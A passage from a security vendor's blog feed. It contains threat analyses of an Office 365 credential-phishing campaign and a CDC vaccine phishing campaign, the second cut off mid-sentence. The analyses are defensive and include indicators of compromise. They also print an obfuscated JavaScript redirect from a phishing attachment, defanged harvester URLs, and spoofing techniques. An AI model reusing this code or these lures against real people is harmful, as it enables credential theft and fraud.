Covid pandemic lingering on yet another year, the <b>World Health Organization</b> (last year’s “ophishal champion”) and Humana both reappear in the top 64. Area 1 also blocked thousands of phishing emails pretending to be from organizations like <b>UNICEF</b> and the <b>Centers for Medicare &amp; Medicaid Services</b> … proving that hackers are more than willing to exploit society’s most vulnerable.</p></li><li><p><b>Grocery Stores/Food &amp; Beverage Retailers:</b> Like <a href="https://www.supermarketnews.com/online-retail/online-channel-builds-share-us-grocery-market-2021">70% of U.S. households</a> last year, my family did a LOT of online grocery shopping. In fact, over half of all shoppers (51%) <a href="https://progressivegrocer.com/new-digital-grocery-shopper">started online grocery shopping</a> after the pandemic began — and our data shows bad actors have also been happy to jump onto this bandwagon shopping cart. Area 1 intercepted millions of phishing emails spoofing grocers of all sizes, across all regions: from <b>Fred Meyer</b> to <b>Amazon Fresh</b>, to <b>Kwik Shop</b> to <b>Costco</b>, and many, many more.  [Insert bad pun about ordering ‘fish’, not ‘phish,’ here].</p></li></ul>
    <div>
      <h3>Who Will Cut Down the (Phishing) Nets?</h3>
      <a href="#who-will-cut-down-the-phishing-nets">
        
      </a>
    </div>
    <p>We’ll reveal the March Hackness champion — the No. 1 brand used for phishing (the organization used in a whopping <b>15% of the overall attacks</b>) — soon!</p><p>And, in the meantime, you might be wondering: “Why should I care? My organization has email authentication and other tools to block emails from fake senders!”</p><p>Well (unless you’re using Area 1), chances are good that brand phishing is still fouling up your organization’s inboxes.</p><p>Email authentication standards (i.e., SPF, DKIM and DMARC) can serve useful security functions such as validating server and tenant origins, protecting message integrity, and providing policy enforcement.</p><p>However, email authentication is <a href="https://gateway.on24.com/wcc/eh/2153307/lp/3955867/how-bad-actors-get-past-dmarc-in-60-minutes-or-less">largely ineffective</a> against brand phishing (especially when in the form of payload-less Business Email Compromise).</p><p>We’ll dive deeper into the reasons why, after we unveil the winner of the 2022 March Hackness: The Phishing Tournament. Stay tuned here.</p><p>PS: We can’t promise our findings will be less stressful than the NCAA championship game on April 4th. But, they should be more useful than wondering what “<a href="https://www.si.com/extra-mustard/2022/03/20/only-one-perfect-march-madness-bracket-remains">GO VOLS! GBO!</a>” is like in real life.</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Spoofing]]></category>
            <guid isPermaLink="false">3FfQgyG9AErA8zhbOfAfse</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Sophisticated Microsoft Spoof Targets Financial Departments]]></title>
            <link>https://blog.cloudflare.com/microsoft-365-spoof-targets-financial-departments/</link>
            <pubDate>Thu, 18 Mar 2021 15:35:00 GMT</pubDate>
            <description><![CDATA[ A sophisticated Microsoft Office 365 credential harvesting campaign targets financial departments at companies across multiple industries, as well as newly-appointed CEOs and executive assistants. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in March 2021 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p>
    <div>
      <h3>Highlights:</h3>
      <a href="#highlights">
        
      </a>
    </div>
    <ul><li><p><b><i>A large Microsoft 365 spoofing campaign evades Office 365’s native defenses and other email security defenses to target financial departments, C-suite executives and executive assistants across the financial services, insurance and retail industries.</i></b></p></li><li><p><b><i>Attackers even specifically targeted newly-selected CEOs during critical transitionary periods.</i></b></p></li><li><p><b><i>The credential harvesting campaigns utilized a variety of sophisticated techniques, including spoofing various Microsoft 365 service updates; using Microsoft-themed sender domains (to bypass email authentication); including PDF/HTM/HTML attachments; and leveraging advanced phishing kits.</i></b></p></li><li><p><b><i>Although Area 1 blocked these campaigns, had the campaigns been successful, the attackers could have, for example, gained access to sensitive data of third parties to send fraudulent invoices and launch additional Business Email Compromise attacks.</i></b></p></li></ul><p>Area 1 Security recently stopped a sophisticated Microsoft Office 365 credential harvesting campaign targeting C-suite executives, high-level assistants, and financial departments across numerous industries, including financial services, insurance, and retail. Further research and analysis of the activity revealed a much larger operation than originally discovered. This included several additional directly-related credential phishing campaigns that targeted the same industries and positions using sophisticated techniques and advanced phishing kits, to bypass Microsoft’s native email defenses and email authentication.</p><p>The campaigns, which began in early December and continued through February, targeted only select individuals at each company. Unlike the “spray and pray” method often seen with these types of cybercriminal-driven credential harvesting campaigns, this limited activity suggests a more targeted approach.</p><p>A large majority of the phishing attacks stopped by Area 1 Security were headed to financial controllers and treasurers at various international companies. By targeting the financial departments of these companies, the attackers could potentially gain access to sensitive data of third parties through invoices and billing, commonly referred to as a BEC (Business Email Compromise) attack. This enables the attackers to send forged invoices from legitimate email addresses to suppliers, resulting in payments being made to attacker-owned accounts.</p><p>Beyond financial departments, the attackers also targeted C-suite and executive assistants. Targeting high-level assistants is an often overlooked method of initial entry, despite these employees having access to highly sensitive information and an overall greater level of privileges.</p><p>In a few instances, the attackers even attempted to bait newly-selected CEOs of two major companies before any public announcements of this significant senior executive changeover were made.</p><p>By sending phishing messages during this critical transitionary period, the attackers likely hoped to catch the new CEOs off guard while they were focused with managing the new challenges that come with running a business.</p><p><b>What makes these phishing campaigns most noteworthy were the sophisticated methods employed by the threat actors at every step of the attack.</b></p><p>Clever tactics were used to not only craft the phishing messages, but also to send those messages, as well as to obtain passwords. These methods utilized a number of techniques at every step — including legitimate-looking domains and login pages, plus advanced phishing kits — to bypass email authentication and Microsoft’s email defenses.</p><p>It’s clear that the masterminds behind these attacks possess above-average skills compared to your typical credential harvesting schemers.</p>
    <div>
      <h3>A Not-So-Secure “Office 365 Update”</h3>
      <a href="#a-not-so-secure-office-365-update">
        
      </a>
    </div>
    <p>The first credential harvesting campaign, which initially bypassed Microsoft’s defenses and other email security layers before being discovered by Area 1 Security, involved emails containing purported instructions for applying an Office 365 security update, as detailed in Figure 1.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/jOAKssOYB019bNyPCkVwF/964bd2f53a94482c2a6288992ee3d4d6/image3.png" />
            
            </figure><p>Figure 1. Phishing Message with Office 365 Brand Spoof</p><p>A bulk of the phishing messages had the Subject, “Important Service Changes”, and contained a number of sender display names that ranged from generic “no-reply” addresses to company-specific names.</p><p>However, other Subject lines, as observed in the additional related campaigns, included “PDF New Policy”, “PDF Service” and “Voice Message Received from Unidentified CallerID”. These related campaigns tailored the messages by also including the targeted company’s name in the Subject line.</p><p>To add legitimacy to the messages, <b>an overwhelming majority of the observed phishing emails were sent from addresses with Microsoft-themed sender domains,</b> such as microsoftoutlookwebservices[.]online and outlookonlinewebservices-com[.]online. The attackers also properly configured the SPF records for these domains to better ensure their messages passed email authentication.</p><p>In an effort to further avoid detection, the threat actors leveraged their Microsoft-imposter domains in the phishing attacks not long after they were registered.</p><p>This quick domain registration turnaround is a common tactic employed by scammers hoping to bait as many victims as possible before their newly registered domains are identified as phishing infrastructure.</p><p>In some cases, the attackers even compromised benign email accounts and used them to send the phishing messages in an attempt to stifle attribution to known actor-controlled phishing infrastructure. They also spoofed email addresses of poorly-configured legitimate sender domains, exploiting inherent weaknesses in email authentication protocols to allow them to easily evade phishing protection solutions.</p><p>Using Microsoft-themed update lures, the attackers appeared to take advantage of the general lack of security awareness that plagues most companies. Microsoft does not proactively send security alerts and updates of this nature via email to end-users, which should be the first sign of foul play. At most, a monthly security notification is sent to network administrators detailing recent Common Vulnerabilities and Exploits (CVEs).</p><p><b>However, because knowledge of an enterprise’s security update process is mostly unknown beyond the IT department, a significant number of employees could easily fall for this phish.</b></p><p>Ironically, fraudsters are constantly profiting off of angst surrounding ongoing cybersecurity scares, like the now-infamous SolarWinds breach, and they know that targets are likely to click out of fear that their noncompliance could be the source of another breach.</p>
    <div>
      <h3>See Attachment to “Apply Update”</h3>
      <a href="#see-attachment-to-apply-update">
        
      </a>
    </div>
    <p>The phishing messages contained just enough details to lure unsuspecting targets into opening the attachment, which was either a PDF, HTML, or HTM file. Depicted in Figure 2 is an example of the PDF attachment, which contains redacted target information, including full name, email address, and company logo.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3JgxiQ66ExhQtALjw2zFwp/5e4f5addb53a0a063a715c270d4415aa/image5.png" />
            
            </figure><p>Figure 2. Example PDF Attachment with Link to Office 365 Credential Harvester</p><p>A majority of the targeted email accounts followed the format @, making the inclusion of full names in the attachments fairly effortless from an automated standpoint. However, even in cases where only initials appeared in the email address, the attackers still managed to include the target’s full name in the PDF attachment. This indicates that the threat actors conducted additional reconnaissance to carefully craft their phishing lures.</p><p>To fulfill the attacker’s request and “install” the feigned security update, the target would need to click on the “Apply Update” button, where they would be taken to one of several spoofed Office 365 login pages. This additional step for loading the credential harvesting site was only required if the target received a PDF attachment.</p><p>For both the HTML and HTM attachments, the credential harvesting site would automatically load in the victim’s browser once the file was opened. As shown in Figure 3, the attackers tried to avoid detection by using the JavaScript escape function to encode the HTML that loads the malicious web page.</p>
            <pre><code>&lt;!DOCTYPE html&gt;
&lt;html dir="ltr" xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head&gt;
&lt;script language="javascript"&gt;document.write(unescape('%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%31%3B%68%74%74%70%73%3A%2F%2F%6C%6F%67%69%6E%2E%6D%69%63%72%6F%73%6F%66%74%6F%66%66%69%63%65%6F%6E%6C%69%6E%65%73%65%72%76%69%63%65%73%2E%63%6F%6D%3F%65%3D'));&lt;/script&gt;
&lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"&gt;&lt;/script&gt;
&lt;title&gt;Outlook&lt;/title&gt;</code></pre>
            <p>Once the code is unescaped, as detailed in Figure 4, you can see how the attackers used HTML “meta” refresh to direct the victim’s browser to load the credential harvesting site.</p>
            <pre><code>&lt;meta http-equiv="refresh" content="1;hxxps://login.microsoftofficeonlineservices[.]com?e=&lt;base64 encoded target email"&gt;</code></pre>
            <p><b>This functionality is one small part of a fairly advanced phishing kit that enabled the attackers to, at least initially, sneak past Microsoft’s Office 365 native defenses, and several other email security solutions, before being identified and stopped by Area 1 Security.</b></p>
    <div>
      <h3>Stealthy Office 365 Phishing Websites and Phishing Kits</h3>
      <a href="#stealthy-office-365-phishing-websites-and-phishing-kits">
        
      </a>
    </div>
    <p>Once the target opens the HTML or HTM attachment, or clicks the “Apply Update” button, their browser will follow a series of HTTP redirects and client-side redirects via JavaScript or Meta fields. For example, one of the many links in the phishing messages that Area 1 Security observed included:</p><p><code>hxxps://simpus3.bandungkab.go[.]id/?username=&lt;_base64 encoded target email address_&gt;</code></p><p>If clicked, the target’s browser would then redirect to the URL:</p>
            <pre><code>hxxps://microsoftofficeonlineservices[.]outlookprivacypolicy[.]online/common/?client_id=4345a7b9-9a63-4910-a426-35363201d503&amp;response_mode=form_post&amp;response_type=code+id_token&amp;scope=openid+profile&amp;state=OpenIdConnect.AuthenticationProperties%3dKZeFMEdbUJBGtfhET_m7HpFINC_qWyaoYc_JS_C5znhJs0YOuquvhkEmzMzK3Ntri00CKVrHEJkyja-3DIXEvtgEaRE5mZ-jAKkVOhjSG4ud7eS1OSBeHlkBsB4tQsqP&amp;nonce=637037128007965152.ODZmZWY4MGMtYzYwNC00M2NjLThmZWEtYmE4OTJiNmI1MWE2OWQwYWVkZWQtMjE2My00ZDcyLWEwN2UtN2M3ODA3OGZiNWY3&amp;redirect_uri=https%3a%2f%2fwww[.]office[.]com%2f&amp;ui_locales=en-US&amp;mkt=en-US&amp;client-request-id=c36fe010-0bb6-4e01-94f8-a8683b752a6d</code></pre>
            <p>As shown in Figure 5, this URL links to the landing page for the credential harvester, which displays a very convincing Microsoft-themed “privacy policy” statement.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/8K5iLRFvh8WAB2CICz3qU/a1f1ceb9dd47b79402ef48f6b1204298/image2.png" />
            
            </figure><p>Figure 5. Fake Microsoft Privacy Policy Statement</p><p>In the upper-right corner of the page is a uniquely photoshopped image of the Microsoft logo. Area 1 Security researchers overlaid this image on a black background, as depicted below, to highlight where the attackers edited the original logo.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5tHCAQNHzvM3r8BQdV4CIo/0219d511eff3566ed8412c1687106c58/image6.png" />
            
            </figure><p>Figure 6. Photoshopped Microsoft Logo</p><p>If the target clicks the “Accept” button on the privacy policy statement, they are further redirected to a fake Office 365 login page:</p>
            <pre><code>hxxps://microsoftofficeonlineservices[.]outlookprivacypolicy[.]online/common/oauth2-authorize/#client_id=4345a7b9-9a63-4910-a426-35363201d503&amp;response_mode=form_post&amp;response_type=code+id_token&amp;scope=openid+profile&amp;state=OpenIdConnect.AuthenticationProperties%3dKZeFMEdbUJBGtfhET_m7HpFINC_qWyaoYc_JS_C5znhJs0YOuquvhkEmzMzK3Ntri00CKVrHEJkyja-3DIXEvtgEaRE5mZ-jAKkVOhjSG4ud7eS1OSBeHlkBsB4tQsqP&amp;nonce=637037128007965152.ODZmZWY4MGMtYzYwNC00M2NjLThmZWEtYmE4OTJiNmI1MWE2OWQwYWVkZWQtMjE2My00ZDcyLWEwN2UtN2M3ODA3OGZiNWY3&amp;redirect_uri=https%3a%2f%2fwww[.]office[.]com%2f&amp;ui_locales=en-US&amp;mkt=en-US&amp;client-request-id=c36fe010-0bb6-4e01-94f8-a8683b752a6d </code></pre>
            <p>The page looks identical to the legitimate login, and to appear all the more convincing, the logo associated with the domain of the targeted company is dynamically loaded. More specifically, the domain appearing in the target’s email address is used to grab the company logo from the site logo.clearbit.com (i.e., <a href="http://logo.clearbit.com/">http://logo.clearbit.com/</a>). For demonstration purposes, the fake email “<a>admin@google[.]com</a>” was used to illustrate how the phishing kit displays the Google logo based on the “google.com” domain found in the “victim” email address.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3MF7RCbLHHEjt8MMRmmUDu/325611c1fe4c88a717ae61fd6cbe0bfa/image1.png" />
            
            </figure><p>Figure 7. Fake Office 365 Login</p><p>In some cases, the attackers were even more stealthy by prefetching the localized Office 365 sign-in:</p><ul><li><p>If the victim entered their email address, the attacker would verify it was a valid Office 365 address.</p></li><li><p>In instances where the entered email address used Conditional Access, a different single sign-on (SSO), Active Directory Federation Services (ADFS), etc., the phishing kit would essentially break, and the victim would simply be redirected to the legitimate sign-in experience.</p></li></ul><p>If the victim entered their password, it would be sent to the attacker as form data via an HTTP POST request to:</p><p><code>hxxps://microsoftofficeonlineservices[.]outlookprivacypolicy[.]online/common/oauth2-authorize/index[.]php</code></p><p>At this point, the attacker could gain full access to the victim’s email account, and possibly other systems or services if the victim reused their password.</p><p>A closer look at the source code for the credential harvesting sites revealed that the threat actors used free-use licenses for front-end web development to assist in creating an <a href="https://www.bankinfosecurity.com/demand-for-phishing-kits-strong-report-a-14140">advanced phishing kit</a> to clone the Microsoft login page.</p><p>For some observed campaigns, the phishing kit created different subdomains based on the email address hardcoded in the URL. Altering the email address would break the link and cause a redirect to either a spoofed Microsoft Service Agreement page, the Google homepage, or simply a blank page.</p><p><b>Unlike your typical run-of-the-mill credential harvesters where any email address can be entered as a URL parameter without affecting its functionality, this activity implies the threat actors were interested in a specific predetermined target list.</b></p><p>Another major difference in this phishing campaign compared to typical credential harvesters — and basic phishing kits for that matter — was the use of websockets to send screenshots back to the attackers on each click, in particular when a victim clicked the “Next” button after entering their email address and password.</p><p>Figure 8 highlights how JavaScript is used to execute the screenshot functionality and encode the resulting image in Base64.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3QasyVUljSXHkysqwYTbWb/96ad9bff6fdfc2b835e8f98b197eead9/image4.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Ex00Kgpx4HvMJlfLV5WP6/8b9ea87ac65e060daa82040344418b7f/image7.png" />
            
            </figure><p>Figure 8. Evidence of Phishing Kit Base64-Encoding Screenshots</p><p>It’s evident that the various campaigns observed by Area 1 Security leveraged an advanced phishing kit that used a variety of techniques as noted above, as well as a diverse set of phishing infrastructure.</p><p><b>At least nine different domains were used to host the credential harvesters. Four of these domains had Microsoft-themed names and appeared to be controlled by the attackers:</b></p><ul><li><p>microsoftofficeonlineservices[.]com</p></li><li><p>outlookprivacypolicy[.]online</p></li><li><p>office-policy-center[.]com</p></li><li><p>ms365[.]us</p></li></ul><p>Not surprisingly, the remaining domains were legitimate websites compromised by the attackers and co-opted for use in their phishing operations. There are a range of benefits for attackers in choosing benign sites to host malicious content, not the least of which includes the site’s positive reputation. It also reduces the attacker’s need to purchase infrastructure that could more easily be traced back to them.</p><p>Despite the fact that these credential harvesters spoofed a Microsoft login page, many of the sites remained active for a considerable time before being flagged as malicious and taken down. This game of “whack-a-mole” was hardly enough to deter these fraudsters. With each takedown, new phishing infrastructure quickly surfaced.</p>
    <div>
      <h3>How to Stop Credential Harvesters</h3>
      <a href="#how-to-stop-credential-harvesters">
        
      </a>
    </div>
    <p>With threat actors well-equipped for stealing employee credentials, it is vital that companies prepare adequate defenses to protect users from falling victim to these login-themed attacks. As attackers continuously invent new ways to bypass defenses, including the use of advanced phishing kits, security practitioners need to turn to solutions on the cutting edge of <a href="https://www.cloudflare.com/zero-trust/solutions/email-security-services/">email security technology</a> in order to block these highly-damaging phishing campaigns.</p><p>New tactics and methods may be able to trick legacy vendors and cloud email providers such as Microsoft, but Area 1 Security’s <a href="https://www.cloudflare.com/zero-trust/products/email-security/">cloud-native email security solution</a> stops these attackers dead in their tracks. Our advanced Machine Learning and Artificial Intelligence technologies allow our algorithms to uncover new tactics used by malicious actors to bypass defenses in real-time (on average 24 days before industry benchmarks), versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time, so that users are never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    <p><b>Phishing Email Subject Lines:</b></p><p>Important Service Changes</p><p> PDF New Policy</p><p> PDF Service</p><p>Voice Message Received from Unidentified CallerID - </p><p><b>Sender Display Names:</b></p><p> TOS</p><p> Outlook</p><p> Notice</p><p> Policy</p><p> Voicemail</p><p> Voicemail Box</p><p>No Reply</p><p>No-reply</p><p>noreply</p><p><b>Sender Addresses:</b></p><p>audio-center@voicemail[.]microsoftoutlookwebservices[.]online</p><p>audio@voicebox[.]microsoftoutlookwebservices[.]online</p><p>mail-service@microsoftoutlookwebservices[.]online</p><p>mailman@microsoftoutlookwebservices[.]online</p><p>messages@voicebox[.]microsoftoutlookwebservices[.]online</p><p>no-reply@voicemailbox[.]microsoftoutlookwebservices[.]online</p><p>noreply@tos[.]microsoftoutlookwebservices[.]online</p><p>postfix@relay-server[.]microsoftoutlookwebservices[.]online</p><p>terms@tos[.]microsoftoutlookwebservices[.]online</p><p>voicemail@message-center[.]microsoftoutlookwebservices[.]online</p><p>voicemail@microsoftoutlookwebservices[.]online</p><p>no-reply@outlookonlinewebservices-com[.]online</p><p>noreply@outlookonlinewebservices-com[.]online</p><p>o365@outlookonlinewebservices-com[.]online</p><p>service@outlookonlinewebservices-com[.]online</p><p>msa@microsoft-message-center[.]outlookonlinewebservices-com[.]online</p><p>no-reply@microsoft-message-center[.]outlookonlinewebservices-com[.]online</p><p>noreply@microsoft-message-center[.]outlookonlinewebservices-com[.]online</p><p>o365@microsoft-message-center[.]outlookonlinewebservices-com[.]online</p><p>service@microsoft-message-center[.]outlookonlinewebservices-com[.]online</p><p>message-center@microsoftofficeonlinemessagecenter-com[.]ru</p><p>msa@microsoftofficeonlinemessagecenter-com[.]ru</p><p>no-reply@microsoftofficeonlinemessagecenter-com[.]ru</p><p>noreply@microsoftofficeonlinemessagecenter-com[.]ru</p><p>policy@microsoftofficeonlinemessagecenter-com[.]ru</p><p>o365@message-center[.]microsoftofficeonlinemessagecenter-com[.]ru</p><p>policy@message-center[.]microsoftofficeonlinemessagecenter-com[.]ru</p><p>no-reply@office[.]microsoftofficeonlinemessagecenter[.]com[.]ru</p><p>office@service[.]microsoftofficeonlinemessagecenter[.]com[.]ru</p><p>do-not-reply@delayed[.]entrepreserves[.]com</p><p>enitity@express[.]entrepreserves[.]com</p><p>nooze@ghosted[.]entrepreserves[.]com</p><p>no-reply@unnnetworked[.]sollutiance[.]com</p><p>no-reply@mynetwork[.]unnetflow[.]com</p><p><b>Actor-Controlled Credential Harvesting Sites:</b></p><p>microsoftofficeonlineservices[.]com</p><p>outlookprivacypolicy[.]online</p><p>office-policy-center[.]com</p><p>ms365[.]us</p><p><b>Actor-Compromised Credential Harvesting Sites:</b></p><p>al-abdal[.]net</p><p>goatourspackage[.]com</p><p>perpustakaanarda[.]papua[.]go[.]id</p><p>satoshiation[.]com</p><p>simpus3[.]bandungkab[.]go[.]id</p><p>theeditorngr[.]com</p><p><b>Links Identified in Phishing Emails:</b></p><p><a href="https://www\[.\]microsoftofficeonlineservices\[.\]com/b/service/?username=\[target">https://www\[.\]microsoftofficeonlineservices\[.\]com/b/service/?username=\[target</a> email address]</p><p><a href="https://login\[.\]microsoftofficeonlineservices\[.\]com?e=\[base64">https://login\[.\]microsoftofficeonlineservices\[.\]com?e=\[base64</a> encoded email]</p><p><a href="https://login\[.\]microsoftonlineservices\[.\]office-policy-center\[.\]com/?e=\[base64">https://login\[.\]microsoftonlineservices\[.\]office-policy-center\[.\]com/?e=\[base64</a> encoded target email address]</p><p><a href="http://ms365\[.\]us/account-login?e=\[base64">http://ms365\[.\]us/account-login?e=\[base64</a> encoded target email address]</p><p><a href="https://goatourspackage\[.\]com/?e=\[base64">https://goatourspackage\[.\]com/?e=\[base64</a> encoded email]</p><p><a href="https://simpus3\[.\]bandungkab\[.\]go\[.\]id/?username=\[base64">https://simpus3\[.\]bandungkab\[.\]go\[.\]id/?username=\[base64</a> encoded email]</p><p><a href="https://al-abdal\[.\]net/outlook/test/?e=\[base64">https://al-abdal\[.\]net/outlook/test/?e=\[base64</a> encoded email]</p><p><a href="https://satoshiation\[.\]com/?e=\[base64">https://satoshiation\[.\]com/?e=\[base64</a> encoded email]</p><p><a href="https://theeditorngr\[.\]com/@?username=\[base64">https://theeditorngr\[.\]com/@?username=\[base64</a> encoded target email address]</p><p><a href="https://perpustakaanarda\[.\]papua\[.\]go\[.\]id?e=\[target">https://perpustakaanarda\[.\]papua\[.\]go\[.\]id?e=\[target</a> email address]</p><p><b>Malicious File Names:</b></p><p>_TOS-Updated_v&lt;8-digit number&gt;.pdf</p><p>PDF Policy_v&lt;8-digit number&gt;.pdf</p><p>_VoiceMessage&lt;8-digit number&gt;.html</p><p>Microsoft-Policy-Updated.pdf</p><p>PolicyUpdate.htm</p><p><b>Modified Microsoft Logo Hashes:</b></p><p>MD5:  900b8133ac181eedbbd698ee2a2fabbc</p><p>SHA1: 1106889AAA1BAFF9F00904BE335F5A373EE7C059</p><p>SHA256: 29256ABAEC0B1325152FC8ADDA5EF62E3BCAE45860A004221EC027321436FEBF</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <guid isPermaLink="false">4qv9XqIEdFFFM0ILdGmXag</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Count yourself in for a vaccine phish: new phishing campaign exploits concern over COVID-19 vaccine availability]]></title>
            <link>https://blog.cloudflare.com/cdc-vaccine-phishing/</link>
            <pubDate>Wed, 27 Jan 2021 11:37:00 GMT</pubDate>
            <description><![CDATA[ Area 1 has uncovered a coronavirus vaccine-themed campaign spoofing the CDC. The attack, which originally bypassed Office 365’s email security, uses a number of techniques to bypass normal anti-spoofing and email authentication methods. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in January 2021 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>As news reports began to break concerning COVID-19 vaccine distribution, and which groups the highly-coveted initial doses would go to first, malicious actors quickly mobilized phishing messages that exploited a variety of ongoing concerns regarding the vaccine. These <a href="https://www.computerweekly.com/news/252493523/Surge-in-Covid-19-vaccine-phishing-scams-reported">attacks</a> ranged from information stealing campaigns to Business Email Compromise (BEC) to operations that aimed to infect victim hosts with malware.</p><p>Area 1 Security discovered one such vaccine-themed phishing message in December, amongst a <a href="https://blog.knowbe4.com/theyre-here-covid-19-vaccine-phishes-finally-arrive">number of similar campaigns</a> making false claims regarding the recently announced vaccine. The attack, which was initially missed by Microsoft Office 365’s spam filters, leverages misinformation about COVID-19 vaccine distribution in an attempt to steal Personally Identifiable Information (PII) from targets, which can then be used for identity theft and other fraudulent activity.</p><p>Figure 1 shows the body of the CDC phishing message that the attacker sent to various targeted companies across multiple industries.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6TcZUaBFtr9OdM8dORVcuX/f1a75b760a4d5cb78aecf0c288892b71/image1-1.png" />
            
            </figure><p>Figure 1. Vaccine-Themed Phishing Message Impersonating the CDC</p><p>The attacker attempts to solicit sensitive information from the target under the guise of ensuring vaccine availability via a Centers for Disease Control and Prevention (CDC) census-like form. The implication is that filling out the linked form is necessary to secure a spot on the vaccine distribution list.</p><p>Seen in Figure 2, the next wave of this campaign engages in brand spoofing with a new and improved graphic to imitate pharmaceutical and vaccine manufacturer Pfizer in addition to using the CDC logo. This comes as no surprise, as impersonation of Pfizer and the CDC is all too common amid the current nationwide roll-out of the COVID-19 vaccine.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1gheB5gvaX50eBdXgYceTG/235031f1351161f36c6173ce7ff64154/image4-1.png" />
            
            </figure><p>Figure 2. Vaccine-Themed Phishing Message with Pfizer Brand Spoof</p><p>To dupe targets into trusting this fraudulent email, the attacker used Display Name Spoofing to make the message appear as if it was sent from within the targeted company. More specifically, the visible FROM address is tailored to include the targeted organization’s domain name followed by the words “Secured Mail.”</p><p>An internal email of this nature is not so unordinary these days, especially given many companies have now established a COVID-19 designated information channel for their employees, including email accounts created specifically for communicating COVID-19 issues and updates. But this alone is hardly enough to bypass your typical anti-spoofing technology. To go the distance, the attacker utilized much more evasive techniques.</p><p>When inspecting the raw email headers, the SMTP Envelope 'MAIL From' address might have you believe the message originated from a legitimate domain, albeit one not related to the targeted company, Pfizer nor the CDC. To carry out this devious tactic, it appears the attacker inserted an SMTP HELO command telling the receiving email server that the message originated from this legitimate domain, when — in actuality, it originated from a completely unrelated IP address: 184[.]80[.]233[.]138.</p><p>Further research into this spoofed ‘Envelope From’ domain unveiled the reasoning behind the attacker’s deceptive approach. This particular domain’s owner did not configure SPF, DKIM or DMARC — email authentication protocols leveraged, at least in part, by most <a href="https://www.cloudflare.com/zero-trust/solutions/email-security-services/">email security solutions</a> to help <a href="https://www.cloudflare.com/learning/email-security/how-to-prevent-phishing/">identify phishing messages</a>.</p><p>What’s more, the spoofed domain had been taken offline some months before this campaign was launched, and thus no longer resolved to an IP address. So when the attacker sent their malicious emails from 184[.]80[.]233[.]138, there were no authentication protocols in place to tip the targeted companies to any suspicious activity.</p><p>In true cyber criminal fashion, the ruse does not end with this clever use of 184[.]80[.]233[.]138. The fraudsters sent from this particular IP address because it belongs to another legitimate business and therefore does not carry a bad reputation. Hence, no spam filters or blocklists of any kind will flag this otherwise benign IP.</p><p>It’s clear the attacker went the distance to evade phishing detection. In a very calculated manner they:</p><ul><li><p>Used Display Name Spoofing to fake the visible FROM header</p></li><li><p>Inserted an SMTP HELO command to spoof the Envelope From domain</p></li><li><p>Chose to spoof a domain that did not have email authentication protocols configured and that no longer resolved to an IP address</p></li><li><p>Compromised a legitimate host with a benign IP, and used it to launch their phishing attack</p></li></ul><p>Traditional defenses will continually miss phish like this. In fact, the messages for this campaign successfully passed through Microsoft’s Office 365 native defenses before being identified and stopped by Area 1.</p>
    <div>
      <h3>CDC “Vassine” Count</h3>
      <a href="#cdc-vassine-count">
        
      </a>
    </div>
    <p>In order to complete the purported contact form for receiving the COVID-19 vaccine, the target is prompted to click on the “COVID19 CDC Count” or “Yes / No” button in the message body. Clicking this link will result in the target’s browser loading the malicious webpage <code>hxxps://mail10298[.]buzz/covid/index.php</code>.</p><p>This phishing website, shown below in Figure 3, lures the victim into entering sensitive information, such as their physical address and driver’s license number. Once provided, the attacker could easily steal the victim’s identity or use the information to enable a range of fraudulent schemes.</p><p>Interestingly enough, the attacker misspells vaccine as “vassine,” indicating English is likely not their native language.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6vHkFhmeNnmcF67qHaI9rL/8e19c5b4aa43fbad6cae794f51db289c/image5-2.png" />
            
            </figure><p>Figure 3. “CDC” Contact Phishing Form</p><p>The domain for the phishing website, mail10298[.]buzz, was registered within 24 hours of the phishing campaign’s debut. This quick turnaround is a common tactic employed by threat actors hoping to bait as many victims as possible before their newly registered domain (NRD) is identified as phishing infrastructure.</p><p>NRDs are consistently used by attackers to fool users into taking actions that jeopardize the security of their organization. Leveraging NRDs is also a common, and particularly effective, attacker technique to circumvent an email security gateway. New domains have very little history or presence, which allows them to bypass typical blocklists and reputation filters. In fact, a significant number of campaigns that Area 1 Security catches leverage new domains, which are often ephemeral (active only for about 48 hours or less).</p><p>After performing a DNS lookup on mail10298[.]buzz, and a WHOIS search on the resultant IP address (102[.]130[.]119[.]118), Area 1 found that the attacker used a Virtual Private Server (VPS) service based in Cape Town, South Africa. There were several dozen additional domains that 